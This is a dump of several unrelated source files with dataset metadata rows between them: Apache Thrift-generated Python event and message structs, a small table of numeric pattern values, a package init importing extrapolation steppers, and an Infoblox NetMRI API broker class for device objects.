        if self.processId is not None:
            oprot.writeFieldBegin('processId', TType.STRING, 3)
            oprot.writeString(self.processId.encode('utf-8') if sys.version_info[0] == 2 else self.processId)
            oprot.writeFieldEnd()
        if self.experimentId is not None:
            oprot.writeFieldBegin('experimentId', TType.STRING, 4)
            oprot.writeString(self.experimentId.encode('utf-8') if sys.version_info[0] == 2 else self.experimentId)
            oprot.writeFieldEnd()
        if self.gatewayId is not None:
            oprot.writeFieldBegin('gatewayId', TType.STRING, 5)
            oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """Raise TProtocolException if any required field is unset."""
        if self.jobId is None:
            raise TProtocolException(message='Required field jobId is unset!')
        if self.taskId is None:
            raise TProtocolException(message='Required field taskId is unset!')
        if self.processId is None:
            raise TProtocolException(message='Required field processId is unset!')
        if self.experimentId is None:
            raise TProtocolException(message='Required field experimentId is unset!')
        if self.gatewayId is None:
            raise TProtocolException(message='Required field gatewayId is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class ExperimentSubmitEvent(object):
    """Thrift struct carrying an experiment submission notification.

    Both fields are required; validate() rejects an instance with either
    field left unset.

    Attributes:
     - experimentId
     - gatewayId
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRING, 'experimentId', 'UTF8', None, ),  # 1
        (2, TType.STRING, 'gatewayId', 'UTF8', None, ),  # 2
    )

    def __init__(self, experimentId=None, gatewayId=None,):
        self.experimentId = experimentId
        self.gatewayId = gatewayId

    def read(self, iprot):
        """Deserialize this struct in place from the input protocol."""
        # Hand off to the accelerated decoder when available.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            fname, ftype, fid = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if ftype == TType.STRING and fid in (1, 2):
                raw = iprot.readString()
                text = raw.decode('utf-8') if sys.version_info[0] == 2 else raw
                if fid == 1:
                    self.experimentId = text
                else:
                    self.gatewayId = text
            else:
                # Unknown or mistyped field: skip for forward compatibility.
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to the output protocol."""
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('ExperimentSubmitEvent')
        # Emit set fields in field-id order; None fields are omitted.
        for value, name, fid in ((self.experimentId, 'experimentId', 1),
                                 (self.gatewayId, 'gatewayId', 2)):
            if value is not None:
                oprot.writeFieldBegin(name, TType.STRING, fid)
                oprot.writeString(value.encode('utf-8') if sys.version_info[0] == 2 else value)
                oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """Raise TProtocolException if a required field is unset."""
        for field_name in ('experimentId', 'gatewayId'):
            if getattr(self, field_name) is None:
                raise TProtocolException(message='Required field %s is unset!' % field_name)
        return

    def __repr__(self):
        parts = ('%s=%r' % item for item in self.__dict__.items())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(parts))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        equal = (self == other)
        return not equal
class ProcessSubmitEvent(object):
    """Thrift struct carrying a process submission request.

    All four fields are required; validate() rejects an instance with any
    field left unset.

    Attributes:
     - processId
     - gatewayId
     - experimentId
     - tokenId
    """

    # (field id, wire type, name, encoding, default) tuples consumed by the
    # accelerated C encoder/decoder; slot 0 is unused by Thrift.
    thrift_spec = (
        None,  # 0
        (1, TType.STRING, 'processId', 'UTF8', None, ),  # 1
        (2, TType.STRING, 'gatewayId', 'UTF8', None, ),  # 2
        (3, TType.STRING, 'experimentId', 'UTF8', None, ),  # 3
        (4, TType.STRING, 'tokenId', 'UTF8', None, ),  # 4
    )

    def __init__(self, processId=None, gatewayId=None, experimentId=None, tokenId=None,):
        self.processId = processId
        self.gatewayId = gatewayId
        self.experimentId = experimentId
        self.tokenId = tokenId

    def read(self, iprot):
        """Deserialize this struct in place from the input protocol *iprot*."""
        # Fast path: delegate to the C decoder when the transport supports it.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        # Slow path: consume fields until STOP, skipping unknown or
        # mistyped fields for forward compatibility.
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.processId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.STRING:
                    self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 3:
                if ftype == TType.STRING:
                    self.experimentId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 4:
                if ftype == TType.STRING:
                    self.tokenId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to the output protocol *oprot*."""
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('ProcessSubmitEvent')
        # Unset (None) fields are omitted from the wire entirely.
        if self.processId is not None:
            oprot.writeFieldBegin('processId', TType.STRING, 1)
            oprot.writeString(self.processId.encode('utf-8') if sys.version_info[0] == 2 else self.processId)
            oprot.writeFieldEnd()
        if self.gatewayId is not None:
            oprot.writeFieldBegin('gatewayId', TType.STRING, 2)
            oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
            oprot.writeFieldEnd()
        if self.experimentId is not None:
            oprot.writeFieldBegin('experimentId', TType.STRING, 3)
            oprot.writeString(self.experimentId.encode('utf-8') if sys.version_info[0] == 2 else self.experimentId)
            oprot.writeFieldEnd()
        if self.tokenId is not None:
            oprot.writeFieldBegin('tokenId', TType.STRING, 4)
            oprot.writeString(self.tokenId.encode('utf-8') if sys.version_info[0] == 2 else self.tokenId)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """Raise TProtocolException if any required field is unset."""
        if self.processId is None:
            raise TProtocolException(message='Required field processId is unset!')
        if self.gatewayId is None:
            raise TProtocolException(message='Required field gatewayId is unset!')
        if self.experimentId is None:
            raise TProtocolException(message='Required field experimentId is unset!')
        if self.tokenId is None:
            raise TProtocolException(message='Required field tokenId is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class ProcessTerminateEvent(object):
    """Thrift struct carrying a process termination request.

    All three fields are required; validate() rejects an instance with any
    field left unset.

    Attributes:
     - processId
     - gatewayId
     - tokenId
    """

    # (field id, wire type, name, encoding, default) tuples consumed by the
    # accelerated C encoder/decoder; slot 0 is unused by Thrift.
    thrift_spec = (
        None,  # 0
        (1, TType.STRING, 'processId', 'UTF8', None, ),  # 1
        (2, TType.STRING, 'gatewayId', 'UTF8', None, ),  # 2
        (3, TType.STRING, 'tokenId', 'UTF8', None, ),  # 3
    )

    def __init__(self, processId=None, gatewayId=None, tokenId=None,):
        self.processId = processId
        self.gatewayId = gatewayId
        self.tokenId = tokenId

    def read(self, iprot):
        """Deserialize this struct in place from the input protocol *iprot*."""
        # Fast path: delegate to the C decoder when the transport supports it.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        # Slow path: consume fields until STOP, skipping unknown or
        # mistyped fields for forward compatibility.
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.processId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.STRING:
                    self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 3:
                if ftype == TType.STRING:
                    self.tokenId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to the output protocol *oprot*."""
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('ProcessTerminateEvent')
        # Unset (None) fields are omitted from the wire entirely.
        if self.processId is not None:
            oprot.writeFieldBegin('processId', TType.STRING, 1)
            oprot.writeString(self.processId.encode('utf-8') if sys.version_info[0] == 2 else self.processId)
            oprot.writeFieldEnd()
        if self.gatewayId is not None:
            oprot.writeFieldBegin('gatewayId', TType.STRING, 2)
            oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
            oprot.writeFieldEnd()
        if self.tokenId is not None:
            oprot.writeFieldBegin('tokenId', TType.STRING, 3)
            oprot.writeString(self.tokenId.encode('utf-8') if sys.version_info[0] == 2 else self.tokenId)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """Raise TProtocolException if any required field is unset."""
        if self.processId is None:
            raise TProtocolException(message='Required field processId is unset!')
        if self.gatewayId is None:
            raise TProtocolException(message='Required field gatewayId is unset!')
        if self.tokenId is None:
            raise TProtocolException(message='Required field tokenId is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class JobStatusChangeEvent(object):
    """Thrift struct pairing a job state code with the job's identity.

    Both fields are required; validate() rejects an instance with either
    field left unset. `state` is an i32 enum value; `jobIdentity` is a
    nested JobIdentifier struct.

    Attributes:
     - state
     - jobIdentity
    """

    # (field id, wire type, name, nested-spec, default); slot 0 is unused.
    thrift_spec = (
        None,  # 0
        (1, TType.I32, 'state', None, None, ),  # 1
        (2, TType.STRUCT, 'jobIdentity', (JobIdentifier, JobIdentifier.thrift_spec), None, ),  # 2
    )

    def __init__(self, state=None, jobIdentity=None,):
        self.state = state
        self.jobIdentity = jobIdentity

    def read(self, iprot):
        """Deserialize this struct in place from the input protocol *iprot*."""
        # Fast path: delegate to the C decoder when the transport supports it.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        # Slow path: consume fields until STOP, skipping unknown or
        # mistyped fields for forward compatibility.
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.I32:
                    self.state = iprot.readI32()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.STRUCT:
                    self.jobIdentity = JobIdentifier()
                    self.jobIdentity.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to the output protocol *oprot*."""
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('JobStatusChangeEvent')
        # Unset (None) fields are omitted from the wire entirely.
        if self.state is not None:
            oprot.writeFieldBegin('state', TType.I32, 1)
            oprot.writeI32(self.state)
            oprot.writeFieldEnd()
        if self.jobIdentity is not None:
            oprot.writeFieldBegin('jobIdentity', TType.STRUCT, 2)
            self.jobIdentity.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """Raise TProtocolException if any required field is unset."""
        if self.state is None:
            raise TProtocolException(message='Required field state is unset!')
        if self.jobIdentity is None:
            raise TProtocolException(message='Required field jobIdentity is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class JobStatusChangeRequestEvent(object):
    """Thrift struct requesting a job state change for a given job identity.

    Both fields are required; validate() rejects an instance with either
    field left unset. `state` is an i32 enum value; `jobIdentity` is a
    nested JobIdentifier struct.

    Attributes:
     - state
     - jobIdentity
    """

    thrift_spec = (
        None,  # 0
        (1, TType.I32, 'state', None, None, ),  # 1
        (2, TType.STRUCT, 'jobIdentity', (JobIdentifier, JobIdentifier.thrift_spec), None, ),  # 2
    )

    def __init__(self, state=None, jobIdentity=None,):
        self.state = state
        self.jobIdentity = jobIdentity

    def read(self, iprot):
        """Deserialize this struct in place from the input protocol."""
        # Hand off to the accelerated decoder when available.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            fname, ftype, fid = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1 and ftype == TType.I32:
                self.state = iprot.readI32()
            elif fid == 2 and ftype == TType.STRUCT:
                self.jobIdentity = JobIdentifier()
                self.jobIdentity.read(iprot)
            else:
                # Unknown or mistyped field: skip for forward compatibility.
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to the output protocol."""
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('JobStatusChangeRequestEvent')
        # Emit set fields in field-id order; None fields are omitted.
        if self.state is not None:
            oprot.writeFieldBegin('state', TType.I32, 1)
            oprot.writeI32(self.state)
            oprot.writeFieldEnd()
        if self.jobIdentity is not None:
            oprot.writeFieldBegin('jobIdentity', TType.STRUCT, 2)
            self.jobIdentity.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """Raise TProtocolException if a required field is unset."""
        for field_name in ('state', 'jobIdentity'):
            if getattr(self, field_name) is None:
                raise TProtocolException(message='Required field %s is unset!' % field_name)
        return

    def __repr__(self):
        parts = ('%s=%r' % item for item in self.__dict__.items())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(parts))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        equal = (self == other)
        return not equal
class Message(object):
    """Thrift struct wrapping a serialized event with routing metadata.

    `event` is a raw binary payload (read/written via readBinary/writeBinary).
    `event`, `messageId` and `messageType` are required (see validate());
    `updatedTime` and `messageLevel` are optional. `messageId` defaults to
    the sentinel 'DO_NOT_SET_AT_CLIENTS' taken from thrift_spec.

    Attributes:
     - event
     - messageId
     - messageType
     - updatedTime
     - messageLevel
    """

    # (field id, wire type, name, encoding, default) tuples consumed by the
    # accelerated C encoder/decoder; slot 0 is unused by Thrift.
    thrift_spec = (
        None,  # 0
        (1, TType.STRING, 'event', 'BINARY', None, ),  # 1
        (2, TType.STRING, 'messageId', 'UTF8', "DO_NOT_SET_AT_CLIENTS", ),  # 2
        (3, TType.I32, 'messageType', None, None, ),  # 3
        (4, TType.I64, 'updatedTime', None, None, ),  # 4
        (5, TType.I32, 'messageLevel', None, None, ),  # 5
    )

    # The messageId default is pulled from thrift_spec[2][4] so the spec
    # stays the single source of truth for the sentinel value.
    def __init__(self, event=None, messageId=thrift_spec[2][4], messageType=None, updatedTime=None, messageLevel=None,):
        self.event = event
        self.messageId = messageId
        self.messageType = messageType
        self.updatedTime = updatedTime
        self.messageLevel = messageLevel

    def read(self, iprot):
        """Deserialize this struct in place from the input protocol *iprot*."""
        # Fast path: delegate to the C decoder when the transport supports it.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        # Slow path: consume fields until STOP, skipping unknown or
        # mistyped fields for forward compatibility.
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    # Binary payload: no text decoding.
                    self.event = iprot.readBinary()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.STRING:
                    self.messageId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 3:
                if ftype == TType.I32:
                    self.messageType = iprot.readI32()
                else:
                    iprot.skip(ftype)
            elif fid == 4:
                if ftype == TType.I64:
                    self.updatedTime = iprot.readI64()
                else:
                    iprot.skip(ftype)
            elif fid == 5:
                if ftype == TType.I32:
                    self.messageLevel = iprot.readI32()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to the output protocol *oprot*."""
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('Message')
        # Unset (None) fields are omitted from the wire entirely.
        if self.event is not None:
            oprot.writeFieldBegin('event', TType.STRING, 1)
            oprot.writeBinary(self.event)
            oprot.writeFieldEnd()
        if self.messageId is not None:
            oprot.writeFieldBegin('messageId', TType.STRING, 2)
            oprot.writeString(self.messageId.encode('utf-8') if sys.version_info[0] == 2 else self.messageId)
            oprot.writeFieldEnd()
        if self.messageType is not None:
            oprot.writeFieldBegin('messageType', TType.I32, 3)
            oprot.writeI32(self.messageType)
            oprot.writeFieldEnd()
        if self.updatedTime is not None:
            oprot.writeFieldBegin('updatedTime', TType.I64, 4)
            oprot.writeI64(self.updatedTime)
            oprot.writeFieldEnd()
        if self.messageLevel is not None:
            oprot.writeFieldBegin('messageLevel', TType.I32, 5)
            oprot.writeI32(self.messageLevel)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """Raise TProtocolException if any required field is unset.

        updatedTime and messageLevel are optional and deliberately not
        checked here.
        """
        if self.event is None:
            raise TProtocolException(message='Required field event is unset!')
        if self.messageId is None:
            raise TProtocolException(message='Required field messageId is unset!')
        if self.messageType is None:
            raise TProtocolException(message='Required field messageType is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
| 37.769886
| 202
| 0.57595
| 5,677
| 53,180
| 5.218954
| 0.033292
| 0.017382
| 0.031288
| 0.035237
| 0.907554
| 0.89196
| 0.878763
| 0.865938
| 0.861854
| 0.856588
| 0
| 0.013967
| 0.314705
| 53,180
| 1,407
| 203
| 37.796731
| 0.799007
| 0.018484
| 0
| 0.835938
| 1
| 0
| 0.06282
| 0.004678
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091146
| false
| 0
| 0.006076
| 0.026042
| 0.217882
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0dd553872a481f8f6b530c27a7e3030928b974a5
| 1,440
|
py
|
Python
|
mysite/patterns/6.py
|
BioinfoNet/prepub
|
e19c48cabf8bd22736dcef9308a5e196cfd8119a
|
[
"MIT"
] | 19
|
2016-06-17T23:36:27.000Z
|
2020-01-13T16:41:55.000Z
|
mysite/patterns/6.py
|
BioinfoNet/prepub
|
e19c48cabf8bd22736dcef9308a5e196cfd8119a
|
[
"MIT"
] | 13
|
2016-06-06T12:57:05.000Z
|
2019-02-05T02:21:00.000Z
|
patterns/6.py
|
OmnesRes/GRIMMER
|
173c99ebdb6a9edb1242d24a791d0c5d778ff643
|
[
"MIT"
] | 7
|
2017-03-28T18:12:22.000Z
|
2021-06-16T09:32:59.000Z
|
# Lookup tables for pattern 6. The zero, odd and even pattern lists hold
# identical values here, as do the two averages dicts (pattern 6 appears
# not to distinguish parity). NOTE(review): values look like fractions of
# a 36-unit cycle (e.g. 0.138888888889 == 5/36) — confirm units upstream.
pattern_zero=[0.0, 0.138888888889, 0.222222222222, 0.25, 0.333333333333, 0.472222222222, 0.555555555556, 0.583333333333, 0.666666666667, 0.805555555556, 0.888888888889, 0.916666666667]
pattern_odd=[0.0, 0.138888888889, 0.222222222222, 0.25, 0.333333333333, 0.472222222222, 0.555555555556, 0.583333333333, 0.666666666667, 0.805555555556, 0.888888888889, 0.916666666667]
pattern_even=[0.0, 0.138888888889, 0.222222222222, 0.25, 0.333333333333, 0.472222222222, 0.555555555556, 0.583333333333, 0.666666666667, 0.805555555556, 0.888888888889, 0.916666666667]
# Maps each pattern value to its associated average(s).
averages_even={0.0: [0.0], 0.25: [0.5], 0.916666666667: [0.5], 0.138888888889: [0.8333333333333, 0.1666666666667], 0.583333333333: [0.5], 0.555555555556: [0.3333333333333, 0.6666666666667], 0.222222222222: [0.3333333333333, 0.6666666666667], 0.333333333333: [0.0], 0.805555555556: [0.8333333333333, 0.1666666666667], 0.888888888889: [0.3333333333333, 0.6666666666667], 0.472222222222: [0.8333333333333, 0.1666666666667], 0.666666666667: [0.0]}
averages_odd={0.0: [0.0], 0.25: [0.5], 0.916666666667: [0.5], 0.138888888889: [0.8333333333333, 0.1666666666667], 0.583333333333: [0.5], 0.555555555556: [0.3333333333333, 0.6666666666667], 0.222222222222: [0.3333333333333, 0.6666666666667], 0.333333333333: [0.0], 0.805555555556: [0.8333333333333, 0.1666666666667], 0.888888888889: [0.3333333333333, 0.6666666666667], 0.472222222222: [0.8333333333333, 0.1666666666667], 0.666666666667: [0.0]}
| 288
| 443
| 0.760417
| 202
| 1,440
| 5.39604
| 0.108911
| 0.036697
| 0.030275
| 0.154128
| 0.962385
| 0.962385
| 0.962385
| 0.962385
| 0.962385
| 0.962385
| 0
| 0.769517
| 0.065972
| 1,440
| 5
| 444
| 288
| 0.040892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0de272146e387746c1a2cd50a7d91ec805d98e9c
| 205
|
py
|
Python
|
odex/__init__.py
|
acellison/pyodex
|
2d44ce25b326bfe78a558a548a6d911ba004299a
|
[
"MIT"
] | null | null | null |
odex/__init__.py
|
acellison/pyodex
|
2d44ce25b326bfe78a558a548a6d911ba004299a
|
[
"MIT"
] | null | null | null |
odex/__init__.py
|
acellison/pyodex
|
2d44ce25b326bfe78a558a548a6d911ba004299a
|
[
"MIT"
] | 1
|
2020-05-14T10:55:52.000Z
|
2020-05-14T10:55:52.000Z
|
from .gbs import GBS
from .extrapolation_stepper import ExtrapolationStepper
from .make_extrapolation_stepper import make_extrapolation_stepper
from .compute_rextrap_weights import compute_rextrap_weights
| 41
| 66
| 0.902439
| 25
| 205
| 7.04
| 0.4
| 0.340909
| 0.295455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078049
| 205
| 4
| 67
| 51.25
| 0.931217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
21aac55631ae016f18ed0058612351d8710b960a
| 52,439
|
py
|
Python
|
infoblox_netmri/api/broker/v3_8_0/device_object_broker.py
|
infobloxopen/infoblox_netmri
|
aa1c744df7e439dbe163bb9edd165e4e85a9771b
|
[
"Apache-2.0"
] | 12
|
2016-02-19T12:37:54.000Z
|
2022-03-04T20:11:08.000Z
|
infoblox_netmri/api/broker/v3_8_0/device_object_broker.py
|
azinfoblox/infoblox-netmri
|
02372c5231e2677ab6299cb659a73c9a41b4b0f4
|
[
"Apache-2.0"
] | 18
|
2015-11-12T18:37:00.000Z
|
2021-05-19T07:59:55.000Z
|
infoblox_netmri/api/broker/v3_8_0/device_object_broker.py
|
azinfoblox/infoblox-netmri
|
02372c5231e2677ab6299cb659a73c9a41b4b0f4
|
[
"Apache-2.0"
] | 18
|
2016-01-07T12:04:34.000Z
|
2022-03-31T11:05:41.000Z
|
from ..broker import Broker
class DeviceObjectBroker(Broker):
controller = "device_objects"
def show(self, **kwargs):
    """Show the details for the specified device object.

    **Inputs**

    :param DeviceObjectID: The internal NetMRI identifier for this network
        object. (required)
    :type DeviceObjectID: Integer

    :param methods: A list of device object methods; each listed method is
        called on the returned device object and included in the output.
        Available methods are: device_cfg_context, data_source, device.
        (optional)
    :type methods: Array of String

    :param include: A list of associated object types to include in the
        output, returned as outputs named after the association. Available
        includes are: device_cfg_context, data_source, device. (optional)
    :type include: Array of String

    **Outputs**

    :return device_object: The device object identified by the specified
        DeviceObjectID.
    :rtype device_object: DeviceObject
    """
    method_name = self._get_method_fullname("show")
    return self.api_request(method_name, kwargs)
def index(self, **kwargs):
    """List the available device objects.

    Any of the inputs listed may be used to narrow the list; other inputs
    will be ignored. Of the various ways to query lists, using this method
    is most efficient.

    **Inputs**

    :param DeviceID: The internal NetMRI identifiers for the devices to
        which the network objects belong. (api version min 2.6; optional)
    :type DeviceID: Array of Integer

    :param DeviceObjectID: The internal NetMRI identifiers for the network
        objects. (api version min 2.6; optional)
    :type DeviceObjectID: Array of Integer

    :param ObjName: Names of the network objects. (api version min 2.6;
        optional)
    :type ObjName: Array of String

    :param DeviceGroupID: The internal NetMRI identifiers of the device
        groups to which to limit the results. (optional)
    :type DeviceGroupID: Array of Integer

    :param timestamp: The data returned will represent the device objects
        as of this date and time; if omitted, the most recently collected
        data is used. (optional)
    :type timestamp: DateTime

    :param methods: A list of device object methods; each listed method is
        called on every returned device object and included in the output.
        Available methods are: device_cfg_context, data_source, device.
        (optional)
    :type methods: Array of String

    :param include: A list of associated object types to include in the
        output, returned as outputs named after the association. Available
        includes are: device_cfg_context, data_source, device. (optional)
    :type include: Array of String

    :param start: The record number to return in the selected page of
        data. It will always appear, although it may not be the first
        record; see :limit. (optional, default 0)
    :type start: Integer

    :param limit: The size of the page of data — the maximum number of
        records returned. The data is broken into pages of this size and
        the first page containing the start record is returned (e.g. 100
        records with :limit 10 and :start 10 yields records 10-19). The
        maximum limit is 10000. (optional, default 1000)
    :type limit: Integer

    :param sort: The data field(s) to use for sorting the output. Valid
        values are DeviceObjectID, DeviceID, DeviceCfgContextID,
        DataSourceID, ObjFirstSeenTime, ObjStartTime, ObjEndTime,
        ObjTimestamp, ObjChangedCols, ObjName, ObjUseCount,
        ObjArtificialInd, ObjConfigText, ObjProvisionData. (optional,
        default DeviceObjectID)
    :type sort: Array of String

    :param dir: The direction(s) in which to sort the data; valid values
        are 'asc' and 'desc'. (optional, default asc)
    :type dir: Array of String

    :param select: The list of attributes to return for each DeviceObject
        (same valid values as :sort). If empty or omitted, all attributes
        are returned. (optional)
    :type select: Array

    :param goto_field: The field name for NIOS GOTO that is used for
        locating a row position of records. (api version min 2.8;
        optional)
    :type goto_field: String

    :param goto_value: The value of goto_field for NIOS GOTO that is used
        for locating a row position of records. (api version min 2.8;
        optional)
    :type goto_value: String

    **Outputs**

    :return device_objects: An array of the DeviceObject objects that
        match the specified input criteria.
    :rtype device_objects: Array of DeviceObject
    """
    method_name = self._get_method_fullname("index")
    return self.api_list_request(method_name, kwargs)
